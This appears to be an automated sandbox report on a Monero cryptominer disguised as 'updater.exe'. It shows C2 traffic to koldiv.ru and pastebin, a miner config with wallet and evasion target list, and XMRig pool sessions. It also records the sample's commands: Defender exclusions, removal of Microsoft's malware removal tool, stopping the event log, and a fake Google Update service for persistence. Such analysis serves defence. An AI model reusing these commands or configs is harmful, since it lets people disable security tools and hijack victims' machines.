                                                                  Jul 22, 2024 15:46:08.084229946 CEST49724443192.168.2.5141.94.96.195
                                                                  Jul 22, 2024 15:46:08.084253073 CEST44349724141.94.96.195192.168.2.5
                                                                  Jul 22, 2024 15:46:08.132241964 CEST49724443192.168.2.5141.94.96.195
                                                                  Jul 22, 2024 15:46:08.236984968 CEST44349724141.94.96.195192.168.2.5
                                                                  Jul 22, 2024 15:46:08.286140919 CEST49724443192.168.2.5141.94.96.195
                                                                  Jul 22, 2024 15:46:52.627979994 CEST49724443192.168.2.5141.94.96.195
                                                                  Jul 22, 2024 15:46:52.668500900 CEST44349724141.94.96.195192.168.2.5
                                                                  Jul 22, 2024 15:46:52.898170948 CEST44349724141.94.96.195192.168.2.5
                                                                  Jul 22, 2024 15:46:52.942261934 CEST49724443192.168.2.5141.94.96.195
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Jul 22, 2024 15:45:05.821445942 CEST | 52943 | 53 | 192.168.2.5 | 1.1.1.1
Jul 22, 2024 15:45:05.831835032 CEST | 53 | 52943 | 1.1.1.1 | 192.168.2.5
Jul 22, 2024 15:45:06.856748104 CEST | 62668 | 53 | 192.168.2.5 | 1.1.1.1
Jul 22, 2024 15:45:06.996658087 CEST | 53 | 62668 | 1.1.1.1 | 192.168.2.5
Jul 22, 2024 15:45:07.821969032 CEST | 65466 | 53 | 192.168.2.5 | 1.1.1.1
Jul 22, 2024 15:45:07.830107927 CEST | 53 | 65466 | 1.1.1.1 | 192.168.2.5
Jul 22, 2024 15:46:06.697997093 CEST | 60971 | 53 | 192.168.2.5 | 1.1.1.1
Jul 22, 2024 15:46:06.737618923 CEST | 53 | 60971 | 1.1.1.1 | 192.168.2.5
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Jul 22, 2024 15:45:05.821445942 CEST | 192.168.2.5 | 1.1.1.1 | 0xb153 | Standard query (0) | xmr.2miners.com | A (IP address) | IN (0x0001) | false
Jul 22, 2024 15:45:06.856748104 CEST | 192.168.2.5 | 1.1.1.1 | 0x9691 | Standard query (0) | koldiv.ru | A (IP address) | IN (0x0001) | false
Jul 22, 2024 15:45:07.821969032 CEST | 192.168.2.5 | 1.1.1.1 | 0x2373 | Standard query (0) | pastebin.com | A (IP address) | IN (0x0001) | false
Jul 22, 2024 15:46:06.697997093 CEST | 192.168.2.5 | 1.1.1.1 | 0x417e | Standard query (0) | pool.supportxmr.com | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Jul 22, 2024 15:45:05.831835032 CEST | 1.1.1.1 | 192.168.2.5 | 0xb153 | No error (0) | xmr.2miners.com | | 162.19.139.184 | A (IP address) | IN (0x0001) | false
Jul 22, 2024 15:45:06.996658087 CEST | 1.1.1.1 | 192.168.2.5 | 0x9691 | No error (0) | koldiv.ru | | 77.222.57.251 | A (IP address) | IN (0x0001) | false
Jul 22, 2024 15:45:07.830107927 CEST | 1.1.1.1 | 192.168.2.5 | 0x2373 | No error (0) | pastebin.com | | 104.20.4.235 | A (IP address) | IN (0x0001) | false
Jul 22, 2024 15:45:07.830107927 CEST | 1.1.1.1 | 192.168.2.5 | 0x2373 | No error (0) | pastebin.com | | 172.67.19.24 | A (IP address) | IN (0x0001) | false
Jul 22, 2024 15:45:07.830107927 CEST | 1.1.1.1 | 192.168.2.5 | 0x2373 | No error (0) | pastebin.com | | 104.20.3.235 | A (IP address) | IN (0x0001) | false
Jul 22, 2024 15:46:06.737618923 CEST | 1.1.1.1 | 192.168.2.5 | 0x417e | No error (0) | pool.supportxmr.com | pool-fr.supportxmr.com | | CNAME (Canonical name) | IN (0x0001) | false
Jul 22, 2024 15:46:06.737618923 CEST | 1.1.1.1 | 192.168.2.5 | 0x417e | No error (0) | pool-fr.supportxmr.com | | 141.94.96.71 | A (IP address) | IN (0x0001) | false
Jul 22, 2024 15:46:06.737618923 CEST | 1.1.1.1 | 192.168.2.5 | 0x417e | No error (0) | pool-fr.supportxmr.com | | 141.94.96.144 | A (IP address) | IN (0x0001) | false
Jul 22, 2024 15:46:06.737618923 CEST | 1.1.1.1 | 192.168.2.5 | 0x417e | No error (0) | pool-fr.supportxmr.com | | 141.94.96.195 | A (IP address) | IN (0x0001) | false
                                                                  • pastebin.com
                                                                  • koldiv.ru
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.5 | 49705 | 77.222.57.251 | 80 | 5596 | C:\Windows\System32\conhost.exe
Timestamp | Bytes transferred | Direction | Data
Jul 22, 2024 15:45:07.006606102 CEST | 115 | OUT | GET /http://koldiv.ru HTTP/1.1
Accept: */*
Connection: close
Host: koldiv.ru
User-Agent: cpp-httplib/0.12.6
Jul 22, 2024 15:45:07.820501089 CEST | 1236 | IN | HTTP/1.1 404 Not Found
Server: nginx/1.25.4
Date: Mon, 22 Jul 2024 13:45:07 GMT
Content-Type: text/html; charset=iso-8859-1
Transfer-Encoding: chunked
Connection: close
Vary: Accept-Encoding
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Content-Language: en
Data Ascii: 40b<?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en"><head><title>Object not found!</title><link rev="made" href="mailto:webmaster@koldiv.ru" /><style type="text/css">.../*--><![CDATA[/*>...*/ body { color: #000000; background-color: #FFFFFF; } a:link { color: #0000CC; } p, address {margin-left: 3em;} span {font-size: smaller;}/*...*/--></style></head><body><h1>Object not found!</h1><p> The requested URL was not found on this server. If you entered the URL manually please check your spelling and try again. </p><p>If you think this is a server error, please contactthe <a href="mailto:webmaster@koldiv.ru">webmaster</a>.</p><h2>Error 404</h2><address> <a href="/">koldiv.ru</a><br /> <span>Mon Jul 22 16:45
Jul 22, 2024 15:45:07.821124077 CEST | 93 | IN | Data Ascii: :07 2024<br /> Apache/2.2.29 (Gentoo) PHP/7.1.33</span></address></body></html>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.5 | 49708 | 77.222.57.251 | 80 | 5596 | C:\Windows\System32\conhost.exe
Timestamp | Bytes transferred | Direction | Data
Jul 22, 2024 15:45:10.286242962 CEST | 169 | OUT | POST /api/endpoint.php HTTP/1.1
Accept: */*
Connection: close
Content-Length: 366
Content-Type: application/json
Host: koldiv.ru
User-Agent: cpp-httplib/0.12.6
Jul 22, 2024 15:45:10.291414022 CEST | 366 | OUT | Data Ascii: {"id":"vazasxarlpknfxrw","computername":"721680","username":"SYSTEM","gpu":"8VFDNSMY","cpu":"Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz, Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz","remoteconfig":"http://koldiv.ru,https://pastebin.com/raw/HpN5DV4T,htt
Jul 22, 2024 15:45:11.088618040 CEST | 233 | IN | HTTP/1.1 200 OK
Server: nginx/1.25.4
Date: Mon, 22 Jul 2024 13:45:10 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 17
Connection: close
X-Robots-Tag: noindex, nofollow
X-Powered-By: PHP/7.1.33
Data Ascii: {"response":"ok"}


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.5 | 49723 | 77.222.57.251 | 80 | 5596 | C:\Windows\System32\conhost.exe
Timestamp | Bytes transferred | Direction | Data
Jul 22, 2024 15:46:05.801727057 CEST | 169 | OUT | POST /api/endpoint.php HTTP/1.1
Accept: */*
Connection: close
Content-Length: 367
Content-Type: application/json
Host: koldiv.ru
User-Agent: cpp-httplib/0.12.6
Jul 22, 2024 15:46:05.808376074 CEST | 367 | OUT | Data Ascii: {"id":"vazasxarlpknfxrw","computername":"721680","username":"SYSTEM","gpu":"8VFDNSMY","cpu":"Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz, Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz","remoteconfig":"http://koldiv.ru,https://pastebin.com/raw/HpN5DV4T,htt
Jul 22, 2024 15:46:06.695324898 CEST | 1236 | IN | HTTP/1.1 200 OK
Server: nginx/1.25.4
Date: Mon, 22 Jul 2024 13:46:06 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 2750
Connection: close
Vary: Accept-Encoding
X-Robots-Tag: noindex, nofollow
X-Powered-By: PHP/7.1.33
Data Ascii: { "algo": "rx/0", "pool": "pool.supportxmr.com", "port": 443, "wallet": "87owYwMVuHSi8yZPW4UgCrQvab6xkpFiUX2uC1RMxTG1DJukBUWpY1XDkr1hbJMYAYZx1RYdALGsGf6CDtAogzgV5AjPbwx", "password": "3423155643", "nicehash": false, "ssltls": true, "max-cpu": 20, "idle-wait": 5, "idle-cpu": 90, "stealth-targets": "Taskmgr.exe,ProcessHacker.exe,perfmon.exe,procexp.exe,procexp64.exe,ModernWarfare.exe,ShooterGame.exe,ShooterGameServer.exe,ShooterGame_BE.exe,GenshinImpact.exe,FactoryGame.exe,Borderlands2.exe,EliteDangerous64.exe,PlanetCoaster.exe,Warframe.x64.exe,NMS.exe,RainbowSix.exe,RainbowSix_BE.exe,CK2game.exe,ck3.exe,stellaris.exe,arma3.exe,arma3_x64.exe,TslGame.exe,ffxiv.exe,ffxiv_dx11.exe,GTA5.exe,FortniteClient-Win64-Shipping.exe,r5apex.exe,VALORANT.exe,csgo.exe,PortalWars-Win64-Shipping.exe,FiveM.exe,left4dead2.exe,FIFA21.exe,BlackOpsColdWar.exe,EscapeFromTarkov.exe,TEKKEN 7.exe,SRTTR.exe,DeadByDaylight-Win64-Shipping.exe,PointBlank.exe,
Jul 22, 2024 15:46:06.695597887 CEST | 1236 | IN | Data Ascii: enlisted.exe,WorldOfTanks.exe,SoTGame.exe,FiveM_b2189_GTAProcess.exe,NarakaBladepoint.exe,re8.exe,Sonic Colors - Ultimate.exe,iw6sp64_ship.exe,RocketLeague.exe,Cyberpunk2077.exe,FiveM_GTAProcess.exe,RustClient.exe,Photoshop.exe,VideoEditorPlus
Jul 22, 2024 15:46:06.695614100 CEST | 519 | IN | Data Ascii: e, avkwctl.exe, fsav32.exe, mcshield.exe, ntrtscan.exe, avguard.exe, ashServ.exe, AVENGINE.exe,avgemc.exe,tmntsrv.exe,advchk.exe,ahnsd.exe,alertsvc.exe,avmaisrv.exe,avsynmgr.exe,bitdefender_p2p_startup.exe,cavrid.exe,cavtray.exe,cmgrdian.exe,f


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.5 | 49706 | 104.20.4.235 | 443 | 5596 | C:\Windows\System32\conhost.exe
Timestamp | Bytes transferred | Direction | Data
2024-07-22 13:45:08 UTC | 114 | OUT | GET /raw/HpN5DV4T HTTP/1.1
Accept: */*
Connection: close
Host: pastebin.com
User-Agent: cpp-httplib/0.12.6
2024-07-22 13:45:09 UTC | 391 | IN | HTTP/1.1 200 OK
Date: Mon, 22 Jul 2024 13:45:08 GMT
Content-Type: text/plain; charset=utf-8
Transfer-Encoding: chunked
Connection: close
x-frame-options: DENY
x-content-type-options: nosniff
x-xss-protection: 1;mode=block
cache-control: public, max-age=1801
CF-Cache-Status: EXPIRED
Last-Modified: Sat, 20 Jul 2024 16:54:30 GMT
Server: cloudflare
CF-RAY: 8a73de937de74401-EWR
2024-07-22 13:45:09 UTC | 7 | IN | Data Raw: 32 0d 0a 31 32 0d 0a (Data Ascii: 212, i.e. a 2-byte chunk containing "12")
2024-07-22 13:45:09 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a (Data Ascii: 0, the terminating zero-length chunk)


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.5 | 49707 | 104.20.4.235 | 443 | 5596 | C:\Windows\System32\conhost.exe
Timestamp | Bytes transferred | Direction | Data
2024-07-22 13:45:09 UTC | 114 | OUT | GET /raw/xhASwz5f HTTP/1.1
Accept: */*
Connection: close
Host: pastebin.com
User-Agent: cpp-httplib/0.12.6
2024-07-22 13:45:10 UTC | 391 | IN | HTTP/1.1 200 OK
Date: Mon, 22 Jul 2024 13:45:10 GMT
Content-Type: text/plain; charset=utf-8
Transfer-Encoding: chunked
Connection: close
x-frame-options: DENY
x-content-type-options: nosniff
x-xss-protection: 1;mode=block
cache-control: public, max-age=1801
CF-Cache-Status: EXPIRED
Last-Modified: Sat, 20 Jul 2024 16:54:53 GMT
Server: cloudflare
CF-RAY: 8a73de9bd94432e2-EWR
2024-07-22 13:45:10 UTC | 7 | IN | Data Raw: 32 0d 0a 31 32 0d 0a (Data Ascii: 212, i.e. a 2-byte chunk containing "12")
2024-07-22 13:45:10 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a (Data Ascii: 0, the terminating zero-length chunk)


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.5 | 49724 | 141.94.96.195 | 443 | 5596 | C:\Windows\System32\conhost.exe
Timestamp | Bytes transferred | Direction | Data
2024-07-22 13:46:08 UTC | 601 | OUT | Data Ascii: {"id":1,"jsonrpc":"2.0","method":"login","params":{"login":"87owYwMVuHSi8yZPW4UgCrQvab6xkpFiUX2uC1RMxTG1DJukBUWpY1XDkr1hbJMYAYZx1RYdALGsGf6CDtAogzgV5AjPbwx","pass":"3423155643","agent":"XMRig/6.19.3 (Windows NT 10.0; Win64; x64) libuv/1.38.0 msvc/2022","r
2024-07-22 13:46:08 UTC | 539 | IN | Data Ascii: {"id":1,"jsonrpc":"2.0","error":null,"result":{"id":"7aa845a1-35e6-4832-8967-e1a3a890e9c6","job":{"blob":"101081c5f9b406ccf8e0bc21c2e36ea8712d1429a8d9bffac4ceb6e4876b79c85214b49c3e8b1800000000fcb384b88770f351241dbb4b5878bb8c7c2a2bbfab8fd9425b05a985d2c02c9
2024-07-22 13:46:52 UTC | 234 | OUT | Data Ascii: {"id":2,"jsonrpc":"2.0","method":"submit","params":{"id":"7aa845a1-35e6-4832-8967-e1a3a890e9c6","job_id":"6PPiyXlVTcf6PLyGcfIsayfGi0iU","nonce":"d30f0000","result":"1e5f2bb7fb8c08d367daf78874e8a6eb8b771a157ca917a2374aa5622e4d0000"}}
2024-07-22 13:46:52 UTC | 63 | IN | Data Ascii: {"id":2,"jsonrpc":"2.0","error":null,"result":{"status":"OK"}}


Target ID: 0
Start time: 09:44:53
Start date: 22/07/2024
Path: C:\Users\user\Desktop\updater.exe
Wow64 process (32bit): false
Commandline: "C:\Users\user\Desktop\updater.exe"
Imagebase: 0x7ff63b2a0000
File size: 5'285'888 bytes
MD5 hash: D82677AC9971E38439A6F8069E8BA5BF
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: low
Has exited: true

                                                                  Target ID:2
                                                                  Start time:09:44:58
                                                                  Start date:22/07/2024
                                                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
                                                                  Imagebase:0x7ff7be880000
                                                                  File size:452'608 bytes
                                                                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high
                                                                  Has exited:true

                                                                  Target ID:3
                                                                  Start time:09:44:58
                                                                  Start date:22/07/2024
                                                                  Path:C:\Windows\System32\conhost.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                  Imagebase:0x7ff6d64d0000
                                                                  File size:862'208 bytes
                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high
                                                                  Has exited:true

                                                                  Target ID:5
                                                                  Start time:09:45:01
                                                                  Start date:22/07/2024
                                                                  Path:C:\Windows\System32\cmd.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
                                                                  Imagebase:0x7ff7b4cb0000
                                                                  File size:289'792 bytes
                                                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high
                                                                  Has exited:true

                                                                  Target ID:6
                                                                  Start time:09:45:01
                                                                  Start date:22/07/2024
                                                                  Path:C:\Windows\System32\powercfg.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
                                                                  Imagebase:0x7ff654030000
                                                                  File size:96'256 bytes
                                                                  MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:moderate
                                                                  Has exited:true

                                                                  Target ID:7
                                                                  Start time:09:45:01
                                                                  Start date:22/07/2024
                                                                  Path:C:\Windows\System32\conhost.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                  Imagebase:0x7ff6d64d0000
                                                                  File size:862'208 bytes
                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high
                                                                  Has exited:true

                                                                  Target ID:8
                                                                  Start time:09:45:01
                                                                  Start date:22/07/2024
                                                                  Path:C:\Windows\System32\powercfg.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
                                                                  Imagebase:0x7ff654030000
                                                                  File size:96'256 bytes
                                                                  MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:moderate
                                                                  Has exited:true

                                                                  Target ID:9
                                                                  Start time:09:45:01
                                                                  Start date:22/07/2024
                                                                  Path:C:\Windows\System32\conhost.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                  Imagebase:0x7ff6d64d0000
                                                                  File size:862'208 bytes
                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high
                                                                  Has exited:true

                                                                  Target ID:10
                                                                  Start time:09:45:01
                                                                  Start date:22/07/2024
                                                                  Path:C:\Windows\System32\powercfg.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
                                                                  Imagebase:0x7ff654030000
                                                                  File size:96'256 bytes
                                                                  MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:moderate
                                                                  Has exited:true

                                                                  Target ID:11
                                                                  Start time:09:45:01
                                                                  Start date:22/07/2024
                                                                  Path:C:\Windows\System32\conhost.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                  Imagebase:0x7ff6d64d0000
                                                                  File size:862'208 bytes
                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high
                                                                  Has exited:true

                                                                  Target ID:12
                                                                  Start time:09:45:01
                                                                  Start date:22/07/2024
                                                                  Path:C:\Windows\System32\powercfg.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
                                                                  Imagebase:0x7ff654030000
                                                                  File size:96'256 bytes
                                                                  MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:moderate
                                                                  Has exited:true

                                                                  Target ID:13
                                                                  Start time:09:45:01
                                                                  Start date:22/07/2024
                                                                  Path:C:\Windows\System32\conhost.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                  Imagebase:0x7ff6d64d0000
                                                                  File size:862'208 bytes
                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high
                                                                  Has exited:true

                                                                  Target ID:14
                                                                  Start time:09:45:01
                                                                  Start date:22/07/2024
                                                                  Path:C:\Windows\System32\wusa.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:wusa /uninstall /kb:890830 /quiet /norestart
                                                                  Imagebase:0x7ff64bbc0000
                                                                  File size:345'088 bytes
                                                                  MD5 hash:FBDA2B8987895780375FE0E6254F6198
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  Target ID:15
                                                                  Start time:09:45:01
                                                                  Start date:22/07/2024
                                                                  Path:C:\Windows\System32\conhost.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                  Imagebase:0x7ff6d64d0000
                                                                  File size:862'208 bytes
                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  Target ID:16
                                                                  Start time:09:45:01
                                                                  Start date:22/07/2024
                                                                  Path:C:\Windows\System32\sc.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\system32\sc.exe delete "GoogleUpdateTaskMachineQC"
                                                                  Imagebase:0x7ff6b9630000
                                                                  File size:72'192 bytes
                                                                  MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  Target ID:17
                                                                  Start time:09:45:02
                                                                  Start date:22/07/2024
                                                                  Path:C:\Windows\System32\conhost.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                  Imagebase:0x7ff6d64d0000
                                                                  File size:862'208 bytes
                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  Target ID:18
                                                                  Start time:09:45:02
                                                                  Start date:22/07/2024
                                                                  Path:C:\Windows\System32\sc.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\system32\sc.exe create "GoogleUpdateTaskMachineQC" binpath= "C:\ProgramData\Google\Chrome\updater.exe" start= "auto"
                                                                  Imagebase:0x7ff6b9630000
                                                                  File size:72'192 bytes
                                                                  MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  Target ID:19
                                                                  Start time:09:45:02
                                                                  Start date:22/07/2024
                                                                  Path:C:\Windows\System32\conhost.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                  Imagebase:0x7ff6d64d0000
                                                                  File size:862'208 bytes
                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  Target ID:20
                                                                  Start time:09:45:02
                                                                  Start date:22/07/2024
                                                                  Path:C:\Windows\System32\sc.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\system32\sc.exe stop eventlog
                                                                  Imagebase:0x7ff6b9630000
                                                                  File size:72'192 bytes
                                                                  MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  Target ID:21
                                                                  Start time:09:45:02
                                                                  Start date:22/07/2024
                                                                  Path:C:\Windows\System32\sc.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\system32\sc.exe start "GoogleUpdateTaskMachineQC"
                                                                  Imagebase:0x7ff6b9630000
                                                                  File size:72'192 bytes
                                                                  MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  Target ID:22
                                                                  Start time:09:45:02
                                                                  Start date:22/07/2024
                                                                  Path:C:\Windows\System32\conhost.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                  Imagebase:0x7ff6d64d0000
                                                                  File size:862'208 bytes
                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  Target ID:23
                                                                  Start time:09:45:02
                                                                  Start date:22/07/2024
                                                                  Path:C:\Windows\System32\conhost.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                  Imagebase:0x7ff6d64d0000
                                                                  File size:862'208 bytes
                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  Target ID:24
                                                                  Start time:09:45:02
                                                                  Start date:22/07/2024
                                                                  Path:C:\ProgramData\Google\Chrome\updater.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\ProgramData\Google\Chrome\updater.exe
                                                                  Imagebase:0x7ff76b5f0000
                                                                  File size:5'285'888 bytes
                                                                  MD5 hash:D82677AC9971E38439A6F8069E8BA5BF
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Antivirus matches:
                                                                  • Detection: 66%, ReversingLabs
                                                                  Has exited:true

                                                                  Target ID:25
                                                                  Start time:09:45:02
                                                                  Start date:22/07/2024
                                                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
                                                                  Imagebase:0x7ff7be880000
                                                                  File size:452'608 bytes
                                                                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  Target ID:26
                                                                  Start time:09:45:02
                                                                  Start date:22/07/2024
                                                                  Path:C:\Windows\System32\conhost.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                  Imagebase:0x7ff6d64d0000
                                                                  File size:862'208 bytes
                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  Target ID:27
                                                                  Start time:09:45:04
                                                                  Start date:22/07/2024
                                                                  Path:C:\Windows\System32\cmd.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
                                                                  Imagebase:0x7ff7b4cb0000
                                                                  File size:289'792 bytes
                                                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  Target ID:28
                                                                  Start time:09:45:04
                                                                  Start date:22/07/2024
                                                                  Path:C:\Windows\System32\powercfg.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
                                                                  Imagebase:0x7ff654030000
                                                                  File size:96'256 bytes
                                                                  MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  Target ID:29
                                                                  Start time:09:45:04
                                                                  Start date:22/07/2024
                                                                  Path:C:\Windows\System32\conhost.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                  Imagebase:0x7ff6d64d0000
                                                                  File size:862'208 bytes
                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  Target ID:30
                                                                  Start time:09:45:04
